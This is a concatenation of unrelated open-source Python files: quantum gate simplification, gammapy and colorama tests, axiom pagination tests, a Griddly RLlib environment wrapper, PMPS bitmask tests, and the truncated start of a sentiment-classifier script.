    # Pauli(90)Pauli'(180)Pauli(90) = Pauli'(180)
    # BUG FIX: the identity only holds when the outer gates rotate about the
    # SAME axis and the middle gate about a DIFFERENT one; the original
    # matched on angles alone and so wrongly collapsed e.g.
    # X(90)X(180)X(90) == X(360) == I down to X(180).
    if type(gate_list[0]) is type(gate_list[2]) and \
            type(gate_list[1]) is not type(gate_list[0]) and \
            int(gate_list[0].theta) == 90 and int(gate_list[1].theta) == 180 \
            and int(gate_list[2].theta) == 90:
        return [gate_list[1]]
    return gate_list
|
<gh_stars>100-1000
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from numpy.testing import assert_allclose
from astropy.time import Time
from gammapy.data import FixedPointingInfo, PointingInfo
from gammapy.utils.testing import assert_time_allclose, requires_data
@requires_data()
class TestFixedPointingInfo:
    """Regression tests for ``FixedPointingInfo`` read from the reference
    pointing table shipped in ``$GAMMAPY_DATA``."""

    @classmethod
    def setup_class(cls):
        # One shared read for the whole class.
        cls.fpi = FixedPointingInfo.read(
            "$GAMMAPY_DATA/tests/pointing_table.fits.gz"
        )

    def test_location(self):
        geodetic = self.fpi.location.geodetic
        assert_allclose(geodetic[0].deg, 16.5002222222222)
        assert_allclose(geodetic[1].deg, -23.2717777777778)
        assert_allclose(geodetic[2].value, 1834.999999999783)

    def test_time_ref(self):
        ref = Time(51910.00074287037, format="mjd", scale="tt")
        assert_time_allclose(self.fpi.time_ref, ref)

    def test_time_start(self):
        start = Time(53025.826414166666, format="mjd", scale="tt")
        assert_time_allclose(self.fpi.time_start, start)

    def test_time_stop(self):
        stop = Time(53025.844770648146, format="mjd", scale="tt")
        assert_time_allclose(self.fpi.time_stop, stop)

    def test_duration(self):
        assert_allclose(self.fpi.duration.sec, 1586.0000000044238)

    def test_radec(self):
        icrs_pos = self.fpi.radec
        assert_allclose(icrs_pos.ra.deg, 83.633333333333)
        assert_allclose(icrs_pos.dec.deg, 24.51444444)
        assert icrs_pos.name == "icrs"

    def test_altaz(self):
        horizon_pos = self.fpi.altaz
        assert_allclose(horizon_pos.az.deg, 7.48272)
        assert_allclose(horizon_pos.alt.deg, 41.84191)
        assert horizon_pos.name == "altaz"
@requires_data()
class TestPointingInfo:
    """Regression tests for ``PointingInfo`` read from the reference
    pointing table shipped in ``$GAMMAPY_DATA``."""

    @classmethod
    def setup_class(cls):
        # Shared fixture: load the pointing table once for all tests.
        filename = "$GAMMAPY_DATA/tests/pointing_table.fits.gz"
        cls.pointing_info = PointingInfo.read(filename)

    def test_str(self):
        # Smoke-test the string representation.
        ss = str(self.pointing_info)
        assert "Pointing info" in ss

    def test_location(self):
        lon, lat, height = self.pointing_info.location.geodetic
        assert_allclose(lon.deg, 16.5002222222222)
        assert_allclose(lat.deg, -23.2717777777778)
        assert_allclose(height.value, 1834.999999999783)

    def test_time_ref(self):
        expected = Time(51910.00074287037, format="mjd", scale="tt")
        assert_time_allclose(self.pointing_info.time_ref, expected)

    def test_table(self):
        # The reference file contains 100 pointing rows.
        assert len(self.pointing_info.table) == 100

    def test_time(self):
        time = self.pointing_info.time
        assert len(time) == 100
        expected = Time(53025.826414166666, format="mjd", scale="tt")
        assert_time_allclose(time[0], expected)

    def test_duration(self):
        duration = self.pointing_info.duration
        assert_allclose(duration.sec, 1586.0000000044238)

    def test_radec(self):
        pos = self.pointing_info.radec[0]
        assert_allclose(pos.ra.deg, 83.633333333333)
        assert_allclose(pos.dec.deg, 24.51444444)
        assert pos.name == "icrs"

    def test_altaz(self):
        pos = self.pointing_info.altaz[0]
        assert_allclose(pos.az.deg, 11.45751357)
        assert_allclose(pos.alt.deg, 41.34088901)
        assert pos.name == "altaz"

    def test_altaz_from_table(self):
        # Values differ slightly from ``altaz``: this path reads the stored
        # table columns rather than recomputing the transform.
        pos = self.pointing_info.altaz_from_table[0]
        assert_allclose(pos.az.deg, 11.20432353385406)
        assert_allclose(pos.alt.deg, 41.37921408774436)
        assert pos.name == "altaz"

    def test_altaz_interpolate(self):
        # Interpolating exactly at a table time should reproduce ``altaz``.
        time = self.pointing_info.time[0]
        pos = self.pointing_info.altaz_interpolate(time)
        assert_allclose(pos.az.deg, 11.45751357)
        assert_allclose(pos.alt.deg, 41.34088901)
        assert pos.name == "altaz"
|
<gh_stars>10-100
# Copyright <NAME> 2013. BSD 3-Clause license, see LICENSE file.
import os
import sys
from unittest import TestCase, main, skipUnless
try:
from unittest.mock import patch
except ImportError:
from mock import patch
from ..ansitowin32 import StreamWrapper
from ..initialise import init
from .utils import osname, redirected_output, replace_by
# Capture the unwrapped streams at import time so the tests below can both
# restore them in tearDown and compare identity against them.
orig_stdout = sys.stdout
orig_stderr = sys.stderr
class InitTest(TestCase):
    """Tests for ``colorama.init``: when stdout/stderr get wrapped in
    ``StreamWrapper`` and how wrapping interacts with platform, ``wrap`` and
    ``autoreset`` options."""

    @skipUnless(sys.stdout.isatty(), "sys.stdout is not a tty")
    def setUp(self):
        # sanity check
        self.assertNotWrapped()

    def tearDown(self):
        # Undo any wrapping a test performed so tests stay independent.
        sys.stdout = orig_stdout
        sys.stderr = orig_stderr

    def assertWrapped(self):
        # Both streams must have been replaced with StreamWrapper instances.
        self.assertIsNot(sys.stdout, orig_stdout, 'stdout should be wrapped')
        self.assertIsNot(sys.stderr, orig_stderr, 'stderr should be wrapped')
        self.assertTrue(isinstance(sys.stdout, StreamWrapper),
            'bad stdout wrapper')
        self.assertTrue(isinstance(sys.stderr, StreamWrapper),
            'bad stderr wrapper')

    def assertNotWrapped(self):
        # Streams must still be the originals captured at import time.
        self.assertIs(sys.stdout, orig_stdout, 'stdout should not be wrapped')
        self.assertIs(sys.stderr, orig_stderr, 'stderr should not be wrapped')

    @patch('colorama.initialise.reset_all')
    @patch('colorama.ansitowin32.winapi_test', lambda *_: True)
    def testInitWrapsOnWindows(self, _):
        # Real Windows console (winapi_test True) -> wrapping happens.
        with osname("nt"):
            init()
            self.assertWrapped()

    @patch('colorama.initialise.reset_all')
    @patch('colorama.ansitowin32.winapi_test', lambda *_: False)
    def testInitDoesntWrapOnEmulatedWindows(self, _):
        # Emulated console (winapi_test False) -> no wrapping needed.
        with osname("nt"):
            init()
            self.assertNotWrapped()

    def testInitDoesntWrapOnNonWindows(self):
        with osname("posix"):
            init()
            self.assertNotWrapped()

    def testInitDoesntWrapIfNone(self):
        with replace_by(None):
            init()
            # We can't use assertNotWrapped here because replace_by(None)
            # changes stdout/stderr already.
            self.assertIsNone(sys.stdout)
            self.assertIsNone(sys.stderr)

    def testInitAutoresetOnWrapsOnAllPlatforms(self):
        # autoreset requires the wrapper even where ANSI is native.
        with osname("posix"):
            init(autoreset=True)
            self.assertWrapped()

    def testInitWrapOffDoesntWrapOnWindows(self):
        with osname("nt"):
            init(wrap=False)
            self.assertNotWrapped()

    def testInitWrapOffIncompatibleWithAutoresetOn(self):
        # autoreset needs wrapping, so wrap=False must be rejected.
        self.assertRaises(ValueError, lambda: init(autoreset=True, wrap=False))

    @patch('colorama.ansitowin32.winterm', None)
    @patch('colorama.ansitowin32.winapi_test', lambda *_: True)
    def testInitOnlyWrapsOnce(self):
        # A second init() must not wrap the already-wrapped streams again.
        with osname("nt"):
            init()
            init()
            self.assertWrapped()

    @patch('colorama.win32.SetConsoleTextAttribute')
    @patch('colorama.initialise.AnsiToWin32')
    def testAutoResetPassedOn(self, mockATW32, _):
        with osname("nt"):
            init(autoreset=True)
            # Two calls: one wrapper each for stdout and stderr.
            self.assertEqual(len(mockATW32.call_args_list), 2)
            self.assertEqual(mockATW32.call_args_list[1][1]['autoreset'], True)
            self.assertEqual(mockATW32.call_args_list[0][1]['autoreset'], True)

    @patch('colorama.initialise.AnsiToWin32')
    def testAutoResetChangeable(self, mockATW32):
        # Each init() re-creates both wrappers; the autoreset flag of the
        # most recent call wins (and defaults back to False).
        with osname("nt"):
            init()
            init(autoreset=True)
            self.assertEqual(len(mockATW32.call_args_list), 4)
            self.assertEqual(mockATW32.call_args_list[2][1]['autoreset'], True)
            self.assertEqual(mockATW32.call_args_list[3][1]['autoreset'], True)
            init()
            self.assertEqual(len(mockATW32.call_args_list), 6)
            self.assertEqual(
                mockATW32.call_args_list[4][1]['autoreset'], False)
            self.assertEqual(
                mockATW32.call_args_list[5][1]['autoreset'], False)

    @patch('colorama.initialise.atexit.register')
    def testAtexitRegisteredOnlyOnce(self, mockRegister):
        # The reset-at-exit hook must be registered on the first init() only.
        init()
        self.assertTrue(mockRegister.called)
        mockRegister.reset_mock()
        init()
        self.assertFalse(mockRegister.called)
# Allow running this test module directly with unittest's CLI runner.
if __name__ == '__main__':
    main()
|
<reponame>hawkowl/axiom<filename>axiom/test/test_paginate.py<gh_stars>1-10
# Copyright 2006 Divmod, Inc. See LICENSE file for details
"""
This module contains tests for the L{axiom.store.ItemQuery.paginate} method.
"""
from twisted.trial.unittest import TestCase
from axiom.store import Store
from axiom.item import Item
from axiom.attributes import integer, compoundIndex
from axiom.test.util import QueryCounter
class SingleColumnSortHelper(Item):
    """Test item with one indexed sort column plus a secondary attribute,
    used to exercise single-column paginate queries."""
    # Primary sort key for the pagination tests.
    mainColumn = integer(indexed=True)
    # Secondary attribute used for restricted-query tests.
    other = integer()
    compoundIndex(mainColumn, other)
class MultiColumnSortHelper(Item):
    """Test item with two columns and a compound index, used to exercise
    paginate with multi-column sort expressions."""
    columnOne = integer()
    columnTwo = integer()
    compoundIndex(columnOne, columnTwo)
class CrossTransactionIteration(TestCase):
    """Tests for L{axiom.store.ItemQuery.paginate}: iteration across
    transactions, per-step query cost, and sort stability.

    NOTE(review): this module uses Python 2 iterator protocol
    (``itr.next()``/``g.next()``) and ``range(...) + [...]`` concatenation —
    it presumably predates Python 3 support; verify before running on py3.
    """

    def test_separateTransactions(self):
        """
        Verify that 'paginate' is iterable in separate transactions.
        """
        s = Store()
        b1 = SingleColumnSortHelper(store=s, mainColumn=1)
        b2 = SingleColumnSortHelper(store=s, mainColumn=2)
        b3 = SingleColumnSortHelper(store=s, mainColumn=3)
        # Start iteration in one transaction...
        itr = s.transact(lambda : iter(s.query(SingleColumnSortHelper).paginate()))
        # ...and continue consuming it in later, separate transactions.
        self.assertIdentical(s.transact(itr.next), b1)
        self.assertEquals(s.transact(lambda : (itr.next(), itr.next())),
                          (b2, b3))
        self.assertRaises(StopIteration, lambda : s.transact(itr.next))

    def test_moreItemsNotMoreWork(self):
        """
        Verify that each step of a paginate does not become more work as items
        are added.
        """
        s = Store()
        self._checkEfficiency(s.query(SingleColumnSortHelper))

    def test_moreItemsNotMoreWorkSorted(self):
        """
        Verify that each step of a paginate does not become more work as more
        items are added even if a sort is given.
        """
        s = Store()
        self._checkEfficiency(s.query(SingleColumnSortHelper,
                                      sort=SingleColumnSortHelper.mainColumn.ascending))

    def test_moreItemsNotMoreWorkRestricted(self):
        # Same efficiency check with an additional restriction clause.
        s = Store()
        self._checkEfficiency(s.query(SingleColumnSortHelper,
                                      SingleColumnSortHelper.other == 6,
                                      sort=SingleColumnSortHelper.mainColumn.ascending))

    def _checkEfficiency(self, qry):
        """Assert that each paginate step costs a constant amount of database
        work, measured with L{QueryCounter}, even as items are added."""
        s = qry.store
        # Mutable counter in a list so the closure below can increment it.
        mnum = [0]
        def more():
            mnum[0] += 1
            SingleColumnSortHelper(store=s, mainColumn=mnum[0], other=6)
        for i in range(5):
            more()
        qc = QueryCounter(s)
        # Sanity check: calling paginate() shouldn't do _any_ DB work.
        L = []
        m = qc.measure(
            # Let's also keep the page-size to 1, forcing the implementation to
            # get exactly 1 item each time. (Otherwise the first N items will
            # take a fixed amount of work, the next 10, and so on, but each
            # subsequent item will take 0, breaking our attempt to measure
            # below)
            lambda : L.append(qry.paginate(pagesize=1)))
        self.assertEquals(m, 0)
        y = L.pop()
        g = iter(y)
        # startup costs a little more, so ignore that
        # s.debug = True
        what = qc.measure(g.next)     # 1
        oneunit = qc.measure(g.next)  # 2
        otherunit = qc.measure(g.next)
        self.assertEquals(otherunit, oneunit) # 3
        # Now, make some more data
        for i in range(3):
            more()

        # and make sure that doesn't increase the amount of work
        self.assertEquals(qc.measure(g.next), oneunit) # 4
        self.assertEquals(qc.measure(g.next), oneunit) # 5
        self.assertEquals(qc.measure(g.next), oneunit) # 6

        # one more sanity check - we're at the end.
        self.assertEquals(g.next().mainColumn, 7)
        self.assertEquals(g.next().mainColumn, 8)
        self.assertEquals(list(g), [])

    def test_storeIDTiebreaker(self):
        """
        Verify that items whose sort column are identical are all returned and
        deterministically ordered.
        """
        s = Store()
        # Ten items share the same sort-column value; first/last bracket them.
        x = [SingleColumnSortHelper(store=s, mainColumn=1234) for nothing in range(10)]
        first = SingleColumnSortHelper(store=s, mainColumn=1233)
        last = SingleColumnSortHelper(store=s, mainColumn=1235)
        # This is sensitive to page size, so let's test it at lots of places
        # where edge-cases are likely to develop in the implementation.
        for pagesize in range(1, 30) + [1000]:
            # The ordering here in the asserts might look a little weird - that we
            # ascend by storeID in both cases regardless of the order of the sort,
            # but it's intentional.  The storeID is merely to be a tiebreaker to
            # provide a stable sort.  You could be sorting by any number of
            # compound columns, 'ascending' for your particular column might mean
            # something odd or contradictory to 'ascending' for storeID's
            # 'ascending'.  If you want guaranteed stability on storeID, do that.
            self.assertEqual(
                list(s.query(
                        SingleColumnSortHelper,
                        sort=SingleColumnSortHelper.mainColumn.descending
                        ).paginate(pagesize=pagesize)),
                [last] + x + [first])
            self.assertEqual(
                list(s.query(
                        SingleColumnSortHelper,
                        sort=SingleColumnSortHelper.mainColumn.ascending
                        ).paginate(pagesize=pagesize)),
                [first] + x + [last])

    def test_moreThanOneColumnSort(self):
        """
        Verify that paginate works with queries that have complex sort expressions.

        Note: it doesn't.
        """
        s = Store()
        x = MultiColumnSortHelper(store=s, columnOne=1, columnTwo=9)
        y1 = MultiColumnSortHelper(store=s, columnOne=2, columnTwo=1)
        y2 = MultiColumnSortHelper(store=s, columnOne=2, columnTwo=2)
        y3 = MultiColumnSortHelper(store=s, columnOne=2, columnTwo=3)
        y4 = MultiColumnSortHelper(store=s, columnOne=2, columnTwo=4)
        z = MultiColumnSortHelper(store=s, columnOne=3, columnTwo=5)
        self.assertEquals(list(
                s.query(MultiColumnSortHelper,
                        sort=[MultiColumnSortHelper.columnOne.ascending,
                              MultiColumnSortHelper.columnTwo.ascending]
                        ).paginate(pagesize=1)),
                          [x, y1, y2, y3, y4, z])
    # Known-broken: marked as an expected failure via trial's 'todo'.
    test_moreThanOneColumnSort.todo = (
        "There's no use-case for this yet, but it would be a consistent "
        "extension of the API.")
|
import os
from collections import defaultdict
import gym
import numpy as np
from ray.rllib import MultiAgentEnv
from ray.rllib.utils.typing import MultiAgentDict
from griddly import GymWrapper
from griddly.util.rllib.environment.observer_episode_recorder import ObserverEpisodeRecorder
class RLlibEnv(GymWrapper):
    """
    Wraps a Griddly environment for compatibility with RLLib.

    Use the `env_config` in the rllib config to provide Griddly Environment Parameters

    Example:

    Firstly register the RLlibWrapper using rllib's

    env_name = "my_env_name"

    register_env(env_name, RLlibWrapper)

    you can then configure it

    rllib_config = {
        'env_config': {
            'yaml_file': 'Single-Player/GVGAI/butterflies.yaml',
            'level': 6,
            'player_observer_type': gd.ObserverType.SPRITE_2D,
            'global_observer_type': gd.ObserverType.ISOMETRIC,
            'max_steps': 1000,
        },
        # Other configuration options
    }

    Create the rllib trainer using this config:

    trainer = ImpalaTrainer(rllib_config, env=env_name)
    """

    def __init__(self, env_config):
        """Build the wrapper; ``env_config`` is forwarded to GymWrapper and
        may also carry video-recording / level-generation options."""
        super().__init__(**env_config)

        self.env_steps = 0
        self._env_idx = None
        self._worker_idx = None

        self.video_initialized = False

        # Optional video recording configuration (None disables recording).
        self.record_video_config = env_config.get('record_video_config', None)

        self.videos = []

        if self.record_video_config is not None:
            self.video_frequency = self.record_video_config.get('frequency', 1000)
            self.video_directory = os.path.realpath(self.record_video_config.get('directory', '.'))
            self.include_global_video = self.record_video_config.get('include_global', True)
            self.include_agent_videos = self.record_video_config.get('include_agents', False)
            os.makedirs(self.video_directory, exist_ok=True)

        self.record_actions = env_config.get('record_actions', False)

        self.generate_valid_action_trees = env_config.get('generate_valid_action_trees', False)
        self._random_level_on_reset = env_config.get('random_level_on_reset', False)

        # Optional pluggable level generator: {'class': ..., 'config': ...}.
        level_generator_rllib_config = env_config.get('level_generator', None)

        self._level_generator = None
        if level_generator_rllib_config is not None:
            level_generator_class = level_generator_rllib_config['class']
            level_generator_config = level_generator_rllib_config['config']
            self._level_generator = level_generator_class(level_generator_config)

        self.reset()

        self.enable_history(self.record_actions)

    def _transform(self, observation):
        """Convert CHW observation(s) to HWC float64, as rllib expects.

        FIX: ``np.float`` (a deprecated alias of the builtin ``float``,
        removed in NumPy 1.24) replaced with the equivalent ``np.float64``.
        """
        if self.player_count > 1:
            transformed_obs = [obs.transpose(1, 2, 0).astype(np.float64) for obs in observation]
        else:
            transformed_obs = observation.transpose(1, 2, 0).astype(np.float64)

        return transformed_obs

    def _after_step(self, observation, reward, done, info):
        """Handle per-step bookkeeping (video recording) for the
        single-agent case and return any extra info to merge into ``info``."""
        extra_info = {}

        # If we are in a multi-agent setting then we handle videos elsewhere
        if self.player_count == 1:
            if self.is_video_enabled():
                videos_list = []
                if self.include_agent_videos:
                    video_info = self._agent_recorder.step(self.level_id, self.env_steps, done)
                    if video_info is not None:
                        videos_list.append(video_info)
                if self.include_global_video:
                    video_info = self._global_recorder.step(self.level_id, self.env_steps, done)
                    if video_info is not None:
                        videos_list.append(video_info)

                self.videos = videos_list

        return extra_info

    def set_transform(self):
        """
        Create the transform for rllib based on the observation space.

        FIX: ``np.float`` replaced with ``np.float64`` (same dtype;
        the alias was removed in NumPy 1.24).
        """

        if self.player_count > 1:
            # All players share the same spaces; expose a single-agent view.
            self.observation_space = self.observation_space[0]
            self.action_space = self.action_space[0]

        # Observation space is transposed CHW -> HWC to match _transform.
        self.observation_space = gym.spaces.Box(
            self.observation_space.low.transpose((1, 2, 0)).astype(np.float64),
            self.observation_space.high.transpose((1, 2, 0)).astype(np.float64),
            dtype=np.float64,
        )

        self.height = self.observation_space.shape[1]
        self.width = self.observation_space.shape[0]

    def _get_valid_action_trees(self):
        # Single-agent environments get the bare tree, not a 1-element list.
        valid_action_trees = self.game.build_valid_action_trees()
        if self.player_count == 1:
            return valid_action_trees[0]
        return valid_action_trees

    def reset(self, **kwargs):
        """Reset the environment, optionally generating or randomly picking
        a level first, and return the transformed initial observation."""
        if self._level_generator is not None:
            kwargs['level_string'] = self._level_generator.generate()
        elif self._random_level_on_reset:
            kwargs['level_id'] = np.random.choice(self.level_count)

        observation = super().reset(**kwargs)
        self.set_transform()

        if self.generate_valid_action_trees:
            self.last_valid_action_trees = self._get_valid_action_trees()

        return self._transform(observation)

    def step(self, action):
        """Step the wrapped env, merge extra info (videos, action trees) and
        return the transformed observation."""
        observation, reward, done, info = super().step(action)

        extra_info = self._after_step(observation, reward, done, info)
        info.update(extra_info)

        if self.generate_valid_action_trees:
            self.last_valid_action_trees = self._get_valid_action_trees()
            info['valid_action_tree'] = self.last_valid_action_trees.copy()

        self.env_steps += 1

        return self._transform(observation), reward, done, info

    def render(self, mode='human', observer=0):
        # Always render the global observer regardless of the argument.
        return super().render(mode, observer='global')

    def is_video_enabled(self):
        # Only the first environment (env_idx == 0) records video.
        return self.record_video_config is not None and self._env_idx is not None and self._env_idx == 0

    def on_episode_start(self, worker_idx, env_idx):
        """Callback from rllib: remember which worker/env we are and lazily
        initialize video recording on the recording environment."""
        self._env_idx = env_idx
        self._worker_idx = worker_idx

        if self.is_video_enabled() and not self.video_initialized:
            self.init_video_recording()
            self.video_initialized = True

    def init_video_recording(self):
        """Create the per-agent and/or global episode recorders
        (single-agent case only; multi-agent recording lives in the wrapper)."""
        if self.player_count == 1:
            if self.include_agent_videos:
                self._agent_recorder = ObserverEpisodeRecorder(
                    self,
                    1,
                    self.video_frequency,
                    self.video_directory
                )
            if self.include_global_video:
                self._global_recorder = ObserverEpisodeRecorder(
                    self,
                    'global',
                    self.video_frequency,
                    self.video_directory
                )
class RLlibMultiAgentWrapper(gym.Wrapper, MultiAgentEnv):
    """Adapts a multi-player RLlibEnv to rllib's MultiAgentEnv interface:
    dict-keyed observations/rewards/dones per agent id (1-based)."""

    def __init__(self, env, env_config):
        super().__init__(env)

        # Optional name of a Griddly global variable that marks players done.
        self._player_done_variable = env_config.get('player_done_variable', None)

        # Used to keep track of agents that are active in the environment
        self._active_agents = set()

        self._agent_recorders = None
        self._global_recorder = None

        self._worker_idx = None
        self._env_idx = None

        assert self.player_count > 1, 'RLlibMultiAgentWrapper can only be used with environments that have multiple agents'

    def _to_multi_agent_map(self, data):
        # Agent ids are 1-based; the underlying lists are 0-based.
        return {a: data[a - 1] for a in self._active_agents}

    def reset(self, **kwargs):
        obs = super().reset(**kwargs)
        # All agents become active again at the start of an episode.
        self._active_agents.update([a + 1 for a in range(self.player_count)])
        return self._to_multi_agent_map(obs)

    def _resolve_player_done_variable(self):
        # Read the per-player "done" global variable from the game state.
        resolved_variables = self.game.get_global_variable([self._player_done_variable])
        return resolved_variables[self._player_done_variable]

    def _after_step(self, obs_map, reward_map, done_map, info_map):
        """Record per-agent / global videos on the recording env instance."""
        extra_info = {}

        if self.is_video_enabled():
            videos_list = []
            if self.include_agent_videos:
                for a in self._active_agents:
                    # NOTE(review): indexes done_map with a 0-based key
                    # (a - 1) while the step() branches above may populate it
                    # with 1-based agent ids — looks inconsistent; confirm
                    # which keying is intended before enabling agent videos.
                    video_info = self._agent_recorders[a].step(self.level_id, self.env_steps, done_map[a - 1])
                    if video_info is not None:
                        videos_list.append(video_info)
            if self.include_global_video:
                video_info = self._global_recorder.step(self.level_id, self.env_steps, done_map['__all__'])
                if video_info is not None:
                    videos_list.append(video_info)

            self.videos = videos_list

        return extra_info

    def step(self, action_dict: MultiAgentDict):
        """Translate the per-agent action dict to the underlying list API,
        step, and fan results back out into per-agent maps."""
        actions_array = [None] * self.player_count
        for agent_id, action in action_dict.items():
            actions_array[agent_id - 1] = action

        obs, reward, all_done, info = super().step(actions_array)

        done_map = {'__all__': all_done}

        if self._player_done_variable is not None:
            griddly_players_done = self._resolve_player_done_variable()

            for agent_id in self._active_agents:
                done_map[agent_id] = griddly_players_done[agent_id] == 1 or all_done
        else:
            # NOTE(review): keys here are 0-based (p) while the branch above
            # uses 1-based agent ids, and the discard loop below removes
            # these keys from the 1-based _active_agents set — presumably a
            # latent off-by-one; TODO confirm against upstream griddly.
            for p in range(self.player_count):
                done_map[p] = False

        if self.generate_valid_action_trees:
            info_map = self._to_multi_agent_map([
                {'valid_action_tree': valid_action_tree} for valid_action_tree in info['valid_action_tree']
            ])
        else:
            info_map = self._to_multi_agent_map(defaultdict(dict))

        if self.record_actions:
            # Route per-event history to the acting player's info dict.
            for event in info['History']:
                event_player_id = event['PlayerId']
                if event_player_id != 0:
                    if 'History' not in info_map[event_player_id]:
                        info_map[event_player_id]['History'] = []
                    info_map[event_player_id]['History'].append(event)

        obs_map = self._to_multi_agent_map(obs)
        reward_map = self._to_multi_agent_map(reward)

        # Finally remove any agent ids that are done
        for agent_id, is_done in done_map.items():
            if is_done:
                self._active_agents.discard(agent_id)

        self._after_step(obs_map, reward_map, done_map, info_map)

        # done_map additionally carries the '__all__' key, hence the -1.
        assert len(obs_map) == len(reward_map)
        assert len(obs_map) == len(done_map) - 1
        assert len(obs_map) == len(info_map)

        return obs_map, reward_map, done_map, info_map

    def is_video_enabled(self):
        # Only the first environment (env_idx == 0) records video.
        return self.record_video_config is not None and self._env_idx is not None and self._env_idx == 0

    def on_episode_start(self, worker_idx, env_idx):
        """Callback from rllib: remember worker/env indices and lazily set up
        video recording on the recording environment."""
        self._env_idx = env_idx
        self._worker_idx = worker_idx

        if self.is_video_enabled() and not self.video_initialized:
            self.init_video_recording()
            self.video_initialized = True

    def init_video_recording(self):
        """Create one recorder per agent (1-based ids) and/or one global
        recorder, according to the video configuration."""
        if self.include_agent_videos:
            self._agent_recorders = {}
            for a in range(self.player_count):
                agent_id = a + 1
                self._agent_recorders[agent_id] = ObserverEpisodeRecorder(
                    self,
                    agent_id,
                    self.video_frequency,
                    self.video_directory
                )
        if self.include_global_video:
            self._global_recorder = ObserverEpisodeRecorder(
                self,
                'global',
                self.video_frequency,
                self.video_directory
            )
|
import logging
import pytest
from pcdscalc.pmps import (LFE, KFE, select_bitmask_boundaries,
get_bitmask, check_bitmask, check_actual_range,
describe_bitmask)
logger = logging.getLogger(__name__)

# 32 bits, using numbers from 1 to 32
test_boundaries = list(range(1, 33))

# Define some utility bitmasks
allow_none = 0          # no bits set: every energy range blocked
allow_all = 2**32-1     # all 32 bits set: every energy range allowed
# Hand-picked patterns exercising edge bits, a contiguous middle run,
# a single bit, and its complement.
bm1 = 0b1111_0000_0000_0000_0000_0000_0000_1111
bm2 = 0b0000_0000_0000_1111_1111_0000_0000_0000
bm3 = 0b0000_0000_0000_0001_0000_0000_0000_0000
bm4 = 0b1111_1111_1111_1110_1111_1111_1111_1111
@pytest.mark.parametrize(
    "test_input,expected",
    [('k', KFE), ('kfe', KFE), ('sxr', KFE),
     ('L', LFE), ('LFE', LFE), ('HXR', LFE)]
)
def test_select_bounds(test_input, expected):
    """Beamline aliases (any case) must resolve to the matching boundary
    list object — identity, not just equality, hence ``is``."""
    logger.debug(f'test_select_bounds({test_input}, {expected})')
    assert select_bitmask_boundaries(test_input) is expected
@pytest.mark.parametrize(
    "lower,upper,allow,expected",
    [(0, 100, True, allow_all),
     (0, 100, False, allow_none),
     (0, 15.5, True, 0b0000_0000_0000_0000_0111_1111_1111_1111),
     (15.5, 100, True, 0b1111_1111_1111_1111_0000_0000_0000_0000),
     (14.5, 21.5, True, 0b0000_0000_0001_1111_1000_0000_0000_0000),
     (14.5, 21.5, False, 0b1111_1111_1100_0000_0011_1111_1111_1111),
     (15, 20, True, 0b0000_0000_0000_1111_1000_0000_0000_0000),
     (15, 20, False, 0b1111_1111_1111_0000_0111_1111_1111_1111)])
def test_get_bitmask(lower, upper, allow, expected):
    """
    Test that the correct bitmask is created.

    Explanation of test cases 3 to 8 (first two are obvious):
    3. Allow between 0 and 15, exclude the 15.5 point because we can't allow
       points like 15.6 and they share a range. Therefore, enable bits 1
       through 15 (bit 1 allows 0 to 1, bit 15 allows 14 to 15).
    4. Allow between 16 and 32, exclude the 15.5 point because we can't allow
       points like 15.4 and they share a range. Cut off at 32 for the top of
       the bitmask range. Therefore, enable bits 17 through 32 (bit 17 allows
       16 to 17).
    5. Allow between 15 and 21, exclude the exact points because we can't allow
       any points outside the range. Enable bits 16 to 21 (bit 16 allows 15 to
       16, bit 21 allows 20 to 21).
    6. Allow between 0 and 14 and between 22 and 32. Turn off bits 15 to 22
       (bit 15 allows 14 to 15, bit 22 allows 21 to 22). Exclude the boundary
       bits for the same reasonings as above.
    7. Allow exactly between 15 and 20. Turn on bits 16 to 20 (bit 16 allows 15
       to 16, bit 20 allows 19 to 20)
    8. Turn off bits 16 to 20 (bit 16 allows 15 to 16, bit 20 allows 19 to 20)
    """
    logger.debug(f'test_get_bitmask({lower}, {upper}, {allow}, {expected})')
    # 'tst' line name is arbitrary here; bounds override pins the boundaries
    # to the 1..32 test table defined above.
    bitmask = get_bitmask(lower, upper, allow, 'tst', bounds=test_boundaries)
    assert bitmask == expected
@pytest.mark.parametrize(
    "energy,bitmask,expected",
    [(-1, allow_all, False), (100, allow_all, False), (16, allow_all, True),
     (0, allow_none, False), (15, allow_none, False), (30, allow_none, False),
     (0, bm1, True), (16, bm1, False), (30, bm1, True), (40, bm1, False),
     (0, bm2, False), (16, bm2, True), (30, bm2, False), (-1, bm2, False),
     (7, bm3, False), (16, bm3, False), (16.5, bm3, True), (17, bm3, False),
     (15, bm4, True), (16, bm4, False), (16.5, bm4, False), (17, bm4, False)])
def test_check_bitmask(energy, bitmask, expected):
    """A given energy should be allowed/blocked by the bitmask exactly as
    the parametrized table says (out-of-range energies are never allowed)."""
    # FIX: the debug message previously lacked its closing ')'.
    logger.debug(f'test_check_bitmask({energy}, {bitmask}, {expected})')
    ok = check_bitmask(energy, bitmask, 'tst', bounds=test_boundaries)
    assert ok == expected
@pytest.mark.parametrize(
    "lower,upper,allow,expected",
    [(0, 100, True, (0, 32)),
     (10, 20, True, (10, 20)),
     (10.5, 20.5, True, (11, 20)),
     (11, 21, False, (11, 21)),
     (9.5, 15.5, False, (9, 16)),
     (10.4, 10.6, True, (10.4, 10.4))])
def test_actual_range(lower, upper, allow, expected):
    """The effective (snapped-to-boundary) range must match the table:
    allowed ranges shrink inward, blocked ranges grow outward, and a range
    entirely inside one bin collapses (last case)."""
    logger.debug(f'test_actual_range({lower}, {upper}, {allow}, {expected})')
    span = check_actual_range(lower, upper, allow, 'tst',
                              bounds=test_boundaries)
    assert span == expected
@pytest.mark.parametrize(
    "test_input",
    [allow_none, allow_all, bm1, bm2, bm3, bm4])
def test_describe_bitmask(test_input):
    """Smoke test: describe_bitmask must run without raising on a variety of
    masks (no assertion on the rendered text)."""
    logger.debug(f'test_describe_bitmask({test_input})')
    describe_bitmask(test_input, 'tst', bounds=test_boundaries)
|
<filename>sentiment/scripts/pickle_classifiers.py
"""Contains functionalities to train and pickle classifiers for sentiment classification
using default training data."""
import os
import pickle
from nltk import SklearnClassifier, NaiveBayesClassifier
from nltk import classify
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import MultinomialNB, BernoulliNB
from sklearn.svm import LinearSVC
from sentiment import utils
from sentiment.services.preprocess import split_train_test_dataset
from sentiment.services.features import get_feature_sets
def train_naive_bayes_clf(training_set, testing_set):
    """Train NLTK's NaiveBayesClassifier, print its test accuracy
    (historically ~74.26) and most informative features, then pickle it.
